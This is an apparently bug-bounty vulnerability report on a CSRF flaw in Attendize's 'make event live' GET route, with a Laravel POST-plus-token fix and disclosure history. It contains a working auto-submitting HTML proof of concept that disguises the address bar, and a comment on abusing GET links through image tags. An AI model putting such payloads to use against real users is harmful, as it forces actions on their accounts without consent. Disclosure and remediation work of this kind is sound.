Cross-Site Request Forgery (CSRF) in attendize/attendize

Valid

Reported on Sep 25th 2021


Description

An attacker can cause a logged-in Attendize user to mark an event live without intending to: the "make event live" action is triggered by a plain GET request, so any page the user visits can issue it with the user's session cookie.

Proof of Concept

While logged in to Attendize, open this POC.html in a browser; the form submits itself as soon as the page loads.

<!-- CSRF PoC: auto-submits a GET request to the "make event live" endpoint
     using the victim's existing session cookie. "Demo URL" stands in for the
     target endpoint as given in the report. -->
<html>
<body>
<!-- Rewrite the address bar to "/" so the PoC page looks less suspicious -->
<script>history.pushState('', '', '/')</script>
<!-- No method attribute: the form submits as GET, which Laravel's CSRF
     middleware does not check and which a SameSite=Lax cookie still accompanies
     on a top-level navigation -->
<form action="Demo URL">
    <input type="submit" value="Submit request" />
</form>
<script>
  // Submit automatically; no user interaction is needed
  document.forms[0].submit();
</script>
</body>
</html>

Impact

This vulnerability lets an attacker forge a request that makes a logged-in user mark an event live without intending to, simply by luring that user to an attacker-controlled page.

Test

Tested on Safari.

Fix

The action should not be reachable by GET. Laravel's VerifyCsrfToken middleware only verifies tokens on non-read methods (POST, PUT, PATCH, DELETE) and skips GET, HEAD and OPTIONS, so a CSRF token on the GET route would only help if the route verified it itself. The cleaner fix is to change the route to POST and submit it from a form carrying the CSRF token (@csrf). Moving to POST also lets the session cookie's SameSite=Lax setting (Laravel's default in config/session.php, 'same_site' => 'lax') do its job: a Lax cookie is still sent on a cross-site top-level GET navigation, which is exactly why the PoC above works, but it is not sent on a cross-site POST. Treat SameSite as defence in depth, though; the token check is the actual fix.
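To make the fix concrete, here is an added example in Laravel terms; it is not Attendize's own code, and the route path, route name, controller method and template are all assumed for illustration. The two fragments belong to different files (routes/web.php and a Blade view) and are shown together only for comparison:

```php
<?php
// ---- routes/web.php (hypothetical fragment, not Attendize's code) ----
use App\Http\Controllers\EventController; // assumed controller

// BEFORE (vulnerable): a state-changing action reachable by plain GET.
// Laravel's VerifyCsrfToken middleware skips GET/HEAD/OPTIONS entirely, and a
// SameSite=Lax session cookie is still sent on a cross-site top-level GET
// navigation, so a form auto-submitted from an attacker's page succeeds.
Route::get('/event/{event_id}/go_live', [EventController::class, 'postMakeEventLive'])
    ->name('postMakeEventLive');

// AFTER (fixed): accept POST only. The middleware now rejects any request
// without a valid _token, and a Lax cookie is not attached to a cross-site
// POST at all. The GET route is removed, so the old URL answers 405.
Route::post('/event/{event_id}/go_live', [EventController::class, 'postMakeEventLive'])
    ->name('postMakeEventLive');
?>

{{-- ---- Blade view (hypothetical fragment, e.g. the nav link) ---- --}}

{{-- BEFORE: a plain link issues a GET, so any page on the internet can trigger it --}}
<a href="{{ route('postMakeEventLive', ['event_id' => $event->id]) }}">Make event live</a>

{{-- AFTER: a POST form. @csrf expands to a hidden input named _token whose
     value the middleware compares against the token stored in the user's
     session; an attacker's page cannot read that value cross-origin. --}}
<form method="POST" action="{{ route('postMakeEventLive', ['event_id' => $event->id]) }}">
    @csrf
    <button type="submit">Make event live</button>
</form>
```

Note that only one of the two route definitions should exist in a real routes file; they are listed together here to show the change. Keeping a GET alias "for convenience" would reopen the hole, since the middleware never checks tokens on GET.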

We created a GitHub Issue asking the maintainers to create a SECURITY.md (2 years ago)
We have contacted a member of the attendize team and are waiting to hear back (2 years ago)
We have sent a third and final follow up to the attendize team. This report is now considered stale. (2 years ago)

HDVinnie (Researcher), 2 years ago:
To expand:

One way GET could be abused here is that a person (competitor perhaps:) placed an image tag with src="<your logout link>" ANYWHERE on the internet, and if a user of your site stumbles upon that page, he will be unknowingly logged out.

This is why it should be a POST with a @csrf token.

Johanna Cherry validated this vulnerability (2 years ago)
HDVinnie has been awarded the disclosure bounty
The fix bounty is now up for grabs
Johanna Cherry marked this as fixed with commit a2aadf (2 years ago)
Johanna Cherry has been awarded the fix bounty
This vulnerability will not receive a CVE
TopNav.blade.php#L10 has been validated
web.php#L326-L328 has been validated